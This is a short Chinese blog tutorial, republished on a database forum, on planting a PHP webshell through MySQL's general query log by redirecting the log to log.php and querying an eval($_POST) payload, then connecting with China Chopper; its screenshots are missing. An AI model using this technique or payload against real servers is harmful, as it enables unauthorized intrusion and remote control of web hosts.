暂无图片
暂无图片
暂无图片
暂无图片
暂无图片

MySql拿webshell的另一种手段

白帽子社区 2021-04-25
1279

大多数的用户在对于mysqlwebshell的手段依旧停留在into outfile上面或者是导入udf提权,但是随着数据库版本的提升就导致了这些手法都失去了作用。

那么现在步入正题,本次要介绍的是通过Mysql日志文件来备份Webshell。默认情况下这个功能是被关闭的。

此时我们将这个功能设置为On

此时我们所有操作的SQL语句均会被记录在日志文件中。

此时我们修改日志文件的保存路径

此时我们的日志文件便会以log.php文件名保存

访问一下文件

现在我们直接按照into outfile那种思路来直接查询 SELECT  <?php eval($_POST[baobao]); ?>;

用菜刀连接日志文件

以上就是本次的内容


      扫描下方二维码关注我们


文章转载自白帽子社区,如果涉嫌侵权,请发送邮件至:contact@modb.pro进行举报,并提供相关证据,一经查实,墨天轮将立刻删除相关内容。

评论